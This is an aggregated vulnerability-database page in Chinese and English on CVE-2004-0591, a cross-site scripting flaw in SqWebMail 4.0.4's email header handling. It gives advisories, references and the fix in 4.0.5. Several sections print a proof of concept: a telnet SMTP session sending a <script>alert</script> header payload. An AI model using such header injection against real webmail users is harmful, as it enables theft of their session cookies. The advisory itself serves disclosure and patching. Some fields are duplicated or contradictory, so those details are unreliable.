CVE-2004-0591
CVSS6.8
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:46:26
NMCOES    

[原文]Cross-site scripting (XSS) vulnerability in the print_header_uc function for SqWebMail 4.0.4 and earlier, and possibly 3.x, allows remote attackers to inject arbitrary web script or HRML via (1) e-mail headers or (2) a message with a "message/delivery-status" MIME Content-Type.


[CNNVD]SqWebMail Email头字段HTML注入漏洞(CNNVD-200408-078)

        
        SqWebMail是一款基于WEB的邮件系统。
        SqWebMail不正确过滤用户提供的EMAIL头字符串,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得敏感信息。
        攻击者发送的一个EMAIL消息如果在头字段包含类似如下的HTML代码:
        "":
        ashanti@dns:~$ telnet localhost 25
        Trying x.x.x.x...
        Connected to x.x.x.x.
        Escape character is '^]'.
        220 x.x.x.x ESMTP
        helo foo
        250 x.x.x.x
        mail from:
        250 ok
        rcpt to:
        250 ok
        data
        354 go ahead
        
        .
        [...]
        当目标用户查看时可导致恶意脚本代码在用户浏览器上执行,泄露基于验证的COOKIE等信息。
        另外攻击者也可以发送MIME Content-Type字段中设置畸形内容的"message/delivery-status",也可能触发漏洞。
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0591
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0591
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-078
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108786212220140&w=2
(UNKNOWN)  BUGTRAQ  20040621 XSS vulnerability in Sqwebmail 4.0.4
http://www.debian.org/security/2004/dsa-533
(VENDOR_ADVISORY)  DEBIAN  DSA-533
http://www.gentoo.org/security/en/glsa/glsa-200408-02.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200408-02
http://www.securityfocus.com/bid/10588
(PATCH)  BID  10588
http://xforce.iss.net/xforce/xfdb/16467
(UNKNOWN)  XF  sqwebmail-print-header-xss(16467)

- 漏洞信息

SqWebMail Email头字段HTML注入漏洞
中危 输入验证
2004-08-06 00:00:00 2007-01-02 00:00:00
远程  
        
        SqWebMail是一款基于WEB的邮件系统。
        SqWebMail不正确过滤用户提供的EMAIL头字符串,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得敏感信息。
        攻击者发送的一个EMAIL消息如果在头字段包含类似如下的HTML代码:
        "":
        ashanti@dns:~$ telnet localhost 25
        Trying x.x.x.x...
        Connected to x.x.x.x.
        Escape character is '^]'.
        220 x.x.x.x ESMTP
        helo foo
        250 x.x.x.x
        mail from:
        250 ok
        rcpt to:
        250 ok
        data
        354 go ahead
        
        .
        [...]
        当目标用户查看时可导致恶意脚本代码在用户浏览器上执行,泄露基于验证的COOKIE等信息。
        另外攻击者也可以发送MIME Content-Type字段中设置畸形内容的"message/delivery-status",也可能触发漏洞。
        

- 公告与补丁

        厂商补丁:
        inter7
        ------
        目前厂商已经在4.0.5版本的软件中修复这个安全问题,请到厂商的主页下载:
        
        http://www.inter7.com/sqwebmail/sqwebmail.html

- 漏洞信息 (24227)

SqWebMail 4.0.4 .20040524 Email Header HTML Injection Vulnerability (EDBID:24227)
php webapps
2004-06-21 Verified
0 Luca Legato
N/A [点击下载]
source: http://www.securityfocus.com/bid/10588/info

SqWebMail is reported to be prone to an email header HTML injection vulnerability. This issue presents itself due to a failure of the application to properly sanitize user-supplied email header strings.

The problem presents itself when an unsuspecting user views an email message containing malicious HTML and script code in the email header. 

An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials.

1) sending a raw email message with malformed headers, i.e.
"<script>alert(document.location)</script>":

ashanti@dns:~$ telnet localhost 25
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220 x.x.x.x ESMTP
helo foo
250 x.x.x.x
mail from:<test@test.com>
250 ok
rcpt to:<user@mediaservice.net>
250 ok
data
354 go ahead
<script>alert(document.location)</script>
.
[...]

2) sending a raw email message with the MIME Content-Type header set to
"message/delivery-status" with malformed content (see 1 above).		

- 漏洞信息

7214
SqWebMail print_header_uc Header XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

SqWebMail contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate variables upon submission to the print_header_uc() function. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-06-21 Unknow
2004-06-21 Unknow

- 解决方案

Upgrade to version 4.05 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

SqWebMail Email Header HTML Injection Vulnerability
Input Validation Error 10588
Yes No
2004-06-21 12:00:00 2009-07-12 05:16:00
Discovery of this vulnerability is credited to Luca Legato <luca.legato@mediaservice.net>.

- 受影响的程序版本

Inter7 SqWebMail 4.0.4 .20040524
Inter7 SqWebMail 4.0.5

- 不受影响的程序版本

Inter7 SqWebMail 4.0.5

- 漏洞讨论

SqWebMail is reported to be prone to an email header HTML injection vulnerability. This issue presents itself due to a failure of the application to properly sanitize user-supplied email header strings.

The problem presents itself when an unsuspecting user views an email message containing malicious HTML and script code in the email header.

An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials.

- 漏洞利用

The following example is available:

1) sending a raw email message with malformed headers, i.e.
"&lt;script&gt;alert(document.location)&lt;/script&gt;":

ashanti@dns:~$ telnet localhost 25
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220 x.x.x.x ESMTP
helo foo
250 x.x.x.x
mail from:&lt;test@test.com&gt;
250 ok
rcpt to:&lt;user@mediaservice.net&gt;
250 ok
data
354 go ahead
&lt;script&gt;alert(document.location)&lt;/script&gt;
.
[...]

2) sending a raw email message with the MIME Content-Type header set to
"message/delivery-status" with malformed content (see 1 above).

- 解决方案

The vendor has released version 4.0.5 dealing with this issue. Users of affected packages are urged to upgrade.

Debian has released an advisory (DSA 533-1) to address this issue. Please see the referenced advisory for more information.


Inter7 SqWebMail 4.0.4 .20040524

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站